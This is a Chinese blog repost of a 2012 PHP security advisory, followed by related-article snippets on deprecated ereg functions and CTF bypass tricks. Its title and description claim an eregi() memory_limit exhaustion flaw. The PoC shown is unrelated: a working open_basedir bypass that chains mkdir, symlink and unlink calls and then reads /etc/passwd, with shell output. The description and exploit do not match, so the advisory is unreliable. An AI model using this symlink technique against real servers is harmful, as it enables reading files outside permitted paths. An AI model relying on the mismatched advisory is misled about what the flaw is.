eregi php5.4,PHP 5.4/5.3弃用函数eregi() memory_limit绕过漏洞

最新推荐文章于 2022-04-18 20:21:55 发布
最新推荐文章于 2022-04-18 20:21:55 发布
阅读量181 收藏
点赞数
文章标签: eregi php5.4

发布日期:2012-03-30

更新日期:2012-04-01

受影响系统:

PHP PHP 5.4.0

描述:

--------------------------------------------------------------------------------

PHP 是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。

PHP 5.3之后版本弃用了基于POSIX正则表达式的函数,在5.4.0版本中,仍然使用这些函数,导致了绕过memory_limit,通过eregi()耗尽内存。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

PoC:

127# cat sym.php

symlink("/etc/passwd", "./symlink");

?>

127# php sym.php

PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \

within the allowed path(s): (/www) in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \

within the allowed path(s): (/www) in

/www/test/sym.php on line 2

127#

open_basedir will disallow /etc/passwd.

Let`s see:

127# ls -la

total 8

drwxr-xr-x 2 www www 512 Oct 20 00:33 .

drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..

-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php

-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php

127# pwd

/www/test

127# cat kakao.php

mkdir("abc");

chdir("abc");

mkdir("etc");

chdir("etc");

mkdir("passwd");

chdir("..");

mkdir("abc");

chdir("abc");

mkdir("abc");

chdir("abc");

mkdir("abc");

chdir("abc");

chdir("..");

chdir("..");

chdir("..");

chdir("..");

symlink("abc/abc/abc/abc","tmplink");

symlink("tmplink/../../../etc/passwd", "exploit");

unlink("tmplink");

mkdir("tmplink");

?>

127# php kakao.php

127# ls -la

total 12

drwxr-xr-x 4 www www 512 Oct 20 00:37 .

drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..

drwxr-xr-x 4 www www 512 Oct 20 00:37 abc

lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd

-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php

-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php

drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink

127# cat exploit

# passwd

#

root:*:0:0:god:/root:/bin/csh

..

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't \

need bypass open_basedir, it is a design mistake. PHP will allow \

"tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.

Remember. Don't use open_basedir as a main security feature.

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

Min Xu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 升级到 5.3+ 后出现的一些错误,如 ereg(); ereg_replace(); 函数报错
01-20
 其原因在于:php5.3以上的版本不支持ereg()函数,而是使用preg_match()函数;不支持ereg_replace()函数,而使用preg_replace()函数。  解决方法:将不支持的函数修改为支持的函数即可。   例如  复制代码 ...
php5.3 废弃函数小结
01-20
php5.3被放弃的函数有: ereg();//直接用mb_ereg代替,或是preg_match代替,但是匹配规则需要用/包括起来 eregi();//preg_match代替,在规则后加上i,如:preg_match(“/^(style|style_)(.*)*/i”, $file); ereg_...
eregi函数漏洞
qq_54929891的博客
04-18 677
<?php if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r');//eregi搜索字符串,$b的第一个字符和111拼接后检查1114从是否.
【bugku】web21 (ereg函数绕过)
EC_Carrot的博客
12-17 894
题目 进入题目,源代码里面提示了p1.html,进入该文件,源代码里面会发现script代码里面定义了一串字符,怀疑是base64,解密出来果不其然,上核心代码! if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return
php5.4 eregi,帮助将PHP eregi转换为preg_match
weixin_36308612的博客
04-02 278
我想知道是否有人可以帮助我转换一段不推荐使用的PHP代码.这是我要转换的单行:if(eregi(trim ($request_url_handler[$x]),$this->sys_request_url) && $this->id_found == 0){它是返回网站的配置设置的功能的一部分.以下是整个功能.// GET CORRECT CONFIG FROM DAT...
php版本不同导致报错:Deprecated: Function eregi() is deprecated in
10-23 1369
本地开发测试好好的,上线后报这个错误,查看相关资料,原来是php版本的问题,函数弃用了,那如何解决呢? 解决方法: 找到代码所在的文件 位置 改前:eregi("zoneself.org", $agent) 改后:preg_match("/zoneself.org/", $agent) 本文出自 “清源教育” 博客,转载请注明此处,谢谢!更多有关php技术问题欢迎加群探讨:276
php 5.4漏洞,PHP 5.4/5.3弃用函数eregi() memory_limit绕过漏洞
weixin_42261068的博客
03-17 219
PoC:127# cat sym.php<?phpsymlink("/etc/passwd", "./symlink");?>127# php sym.phpPHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \within the allowed path(s): (...
eregi_replace与preg_replace 函数代码的用法比较
10-30
eregi_replace与preg_replace 函数代码的用法比较
【CTF bugku never give up】关于URL/Base64解码、eregi()z截断、文件包含利用
zw05011的博客
01-14 413
转:https://ciphersaw.me/2017/12/26/【Bugku CTF】 Web —— never give up/ 0x00 前言 此题为 Web 基础题,难度中低,需要的基础知识有:HTML、PHP、HTTP 协议。 首先考查发现源码的能力,其次重点考查 PHP 黑魔法的使用,相关链接如下: 0x01 拦截跳转 点开解题链接,除了一句 never never never give up !!! 之外空空如也,直接查看源码,发现一条注释中有线索: 根据提示打开链接:htt
php ereg处理数组,PHP5.3ereg()报错的问题解决_PHP教程
weixin_42394785的博客
03-16 130
php5.3环境下有时会出现Deprecated: Function ereg() is deprecated in...和Deprecated: Function ereg_replace() is deprecated in...这些类型的报错提示。PHP 5.3 ereg() 无法正常使用,提示“Function ereg() is deprecated Error”。问题根源是php中有...
php 启用ereg,PHP 5.3的ereg / eregi替换
weixin_42097557的博客
03-17 112
我很抱歉提出一个问题,但是在理解正则表达式代码时我没用.在我没写的php模块中是以下功能function isURL($url = NULL) {if($url==NULL) return false;$protocol = '(http://|https://)';$allowed = '([a-z0-9]([-a-z0-9]*[a-z0-9]+)?)';$regex = "^". $proto...
php函数漏洞
h3110n3w0r1d
04-05 1777
1.intval() intval — 获取变量的整数值 说明 int intval ( mixed $var [, int $base = 10 ] ) 通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 参数 var 要转换成 integer 的...
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3011
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
ctf php eregi,【Bugku CTF】 Web —— never give up
weixin_30039395的博客
04-01 831
此题为 Web 基础题,难度中低,需要的基础知识有:HTML、PHP、HTTP 协议。首先考查发现源码的能力,其次重点考查 PHP 黑魔法的使用,相关链接如下:0x01 拦截跳转点开解题链接,除了一句 never never never give up !!! 之外空空如也,直接查看源码,发现一条注释中有线索:请求数据包如下:响应数据包如下:0x02 三重解码根据响应内容中变量 Words 的值,...
php伪协议漏洞_PHP中有哪些语言设计缺陷导致的漏洞
weixin_39758392的博客
01-28 123
我来惹,作为一个web狗,简单总结一下刷ctf遇到的常见php黑魔法:1.题主说的,Strcmp利用数组绕过$password=$_GET['password'];if(strcmp('ceshi',$password)){echo '错误!';}else{echo '正确!';}?>输入password[]=1,则会返回'正确!'2.md5函数特性if (isset($_GET['a'])...
CTF中常见的php函数绕过(保持更新)
热门推荐
csu_vc的博客
11-03 1万+
is_numeric()用于判断是否是数字,通常配合数值判断is_numeric(@$a["param1"])?exit:NULL; if(@$a["param1"]){ ($a["param1"]>2017)?$v1=1:NULL; } //param1不能是数字,但又要比2017大,利用数组$pos = array_search("nudt",$a["param2"]); $pos ==
PHP的ereg()与eregi()的不同及相同点。对比
phphot
11-06 2054
ereg()字符串比对解析。语法: int ereg(string pattern, string string, array [regs]);返回值: 整数/数组函数种类: 资料处理内容说明本函数以 pattern 的规则来解析比对字符串 string。比对结果返回的值放在数组参数 regs 之中,regs[0] 内容就是原字符串 string、regs[1] 为第一个合乎规则的字符串、regs
ereg() 截断漏洞
3569
03-06 9039
提示是ereg()函数漏洞哩;从小老师就说要用科学的方法来算数。<?php if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$",$_GET['password']) === FALSE) { echo '<p>You password must be alphanumeric</p>'
PHP代码审计(ereg截断漏洞)
qq_36609913的博客
02-10 5331
&lt;?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo '&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'; } els...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值